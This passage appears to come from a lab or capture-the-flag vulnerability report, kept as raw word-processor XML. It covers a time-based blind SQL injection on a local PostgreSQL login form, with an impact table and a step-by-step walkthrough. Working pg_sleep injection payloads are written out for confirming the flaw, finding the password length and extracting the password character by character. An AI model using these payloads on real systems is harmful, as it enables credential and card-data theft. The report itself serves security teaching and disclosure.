            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440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T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62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Time differences reveal character by character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E1FD9" w:rsidTr="007E1FD9">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007E1FD9" w:rsidRPr="007E1FD9" w:rsidRDefault="007E1FD9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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007E1FD9" w:rsidRPr="007E1FD9" w:rsidRDefault="007E1FD9" w:rsidP="00E26A1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Actions on Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007E1FD9" w:rsidRPr="007E1FD9" w:rsidRDefault="007E1FD9" w:rsidP="007E1FD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T1530</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007E1FD9" w:rsidRPr="007E1FD9" w:rsidRDefault="007E1FD9" w:rsidP="007E1FD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Extract admin password, login, steal credit cards, retrieve flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008119BD" w:rsidRDefault="008119BD" w:rsidP="00E26A17"/>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00A52DFA" w:rsidRDefault="00B867F6" w:rsidP="00E26A17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A52DFA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3.5 Impact Statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00880D62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An attacker successfully exploiting this vulnerability can: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880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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</w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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Credential Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="575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Extract admin password (supersecret) and all user passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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Financial Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="575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Steal credit card numbers and expiry dates of all users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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Account Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="575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Login as administrator using extracted credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="575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Access the flag and all sensitive database records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="359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Confidentiality Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00AB5D2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Complete exposure of personal and financial data (GDPR/PII impact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008119BD" w:rsidRDefault="008119BD" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008119BD" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00A52DFA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Real-World Consequences:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880D62" w:rsidRDefault="00B867F6" w:rsidP="00880D6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880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Regulatory fines (GDPR, PCI-DSS violation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880D62" w:rsidRDefault="00B867F6" w:rsidP="00880D6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880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Reputational damage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880D62" w:rsidRDefault="00B867F6" w:rsidP="00880D6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880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identity theft risk for affected users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00880D62" w:rsidRDefault="00B867F6" w:rsidP="00880D6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880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Financial fraud using stolen credit cards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00880D62" w:rsidRDefault="0031438B" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="48C15ABC">
          <v:rect id="_x0000_i1029" style="width:468pt;height:1pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#2e74b5 [2404]" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="001C1C06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3.6 Exploitation Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirm Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6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Navigate to http://localhost:5000 and enter in the Username field:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRPr="007F3B84" w:rsidRDefault="00B867F6" w:rsidP="007F3B84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>admin' AND (SELECT pg_sleep(5) FROM pg_sleep(5)) IS NOT NULL AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="007F3B84" w:rsidP="00B867F6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071A621" wp14:editId="4E9FA379">
            <wp:extent cx="3851210" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="749572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72872" name="Picture 74957287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893" cy="195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B84" w:rsidRDefault="007F3B84" w:rsidP="00B867F6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>Then observe the time in Network tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="007F3B84" w:rsidP="00B867F6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ED03931" wp14:editId="3786EF85">
            <wp:extent cx="3823854" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="10550106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0673" name="Picture 105501067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901" cy="19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7F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find Password Length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="001025F6" w:rsidP="00B867F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In u</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sername</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> field</w:t>
      </w:r>
      <w:r w:rsidR="00B867F6" w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>admin' AND (SELECT pg_sleep(5) FROM pg_sleep(5) WHERE LENGTH(password)=11) IS NOT NULL AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="007F3B84" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74E50FA1" wp14:editId="558702E5">
            <wp:extent cx="3977759" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="1045196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6659" name="Picture 104519665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138" cy="198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BD" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Then observe the timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, it is noticeable that the time is delayed so the password length is 11 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4390042A" wp14:editId="06FC8AF0">
            <wp:extent cx="3916680" cy="1970475"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19089206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20654" name="Picture 190892065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735" cy="19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7F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extract Password Characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="007F3B84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Test each position until delay occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>admin' AND (SELECT pg_sleep(5) FROM pg_sleep(5) WHERE SUBSTRING(password,1,1)='</w:t>
      </w:r>
      <w:r w:rsidR="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>') IS NOT NULL AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="007E1FD9" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D093F0" wp14:editId="61C83C12">
            <wp:extent cx="3880199" cy="1958340"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="916976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6982" name="Picture 91697698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68" cy="196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B84" w:rsidRDefault="007F3B84" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notice that the time is not affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, so the first character of the password is not ‘a’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRPr="001025F6" w:rsidRDefault="001025F6" w:rsidP="00B867F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42D2CAB" wp14:editId="5A60679C">
            <wp:extent cx="3909794" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16796598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59834" name="Picture 167965983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053" cy="19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F6" w:rsidRPr="00B867F6" w:rsidRDefault="001025F6" w:rsidP="001025F6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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hen try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="001025F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>admin' AND (SELECT pg_sleep(5) FROM pg_sleep(5) WHERE SUBSTRING(password,1,1)='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>') IS NOT NULL AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B84" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="151D045D" wp14:editId="1E9F2523">
            <wp:extent cx="3948950" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1882182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82138" name="Picture 188218213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328" cy="1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F6" w:rsidRPr="001025F6" w:rsidRDefault="001025F6" w:rsidP="001025F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>After trying character by character, we noticed that in trying the character ‘s’, the time is delayed, so the first character of the password is ‘s’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240239E4" wp14:editId="4772EA9B">
            <wp:extent cx="4039729" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8618559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55904" name="Picture 86185590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101" cy="20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F6" w:rsidRPr="00B867F6" w:rsidRDefault="001025F6" w:rsidP="001025F6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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hen try for second position:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="001025F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>admin' AND (SELECT pg_sleep(5) FROM pg_sleep(5) WHERE SUBSTRING(password,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>,1)='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3B84">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>') IS NOT NULL AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRDefault="001025F6" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21206577" wp14:editId="540B1008">
            <wp:extent cx="4104605" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20966260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26064" name="Picture 209662606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33" cy="20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F6" w:rsidRPr="00F668BD" w:rsidRDefault="001025F6" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notice that the time is delayed so the second character is ‘u’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
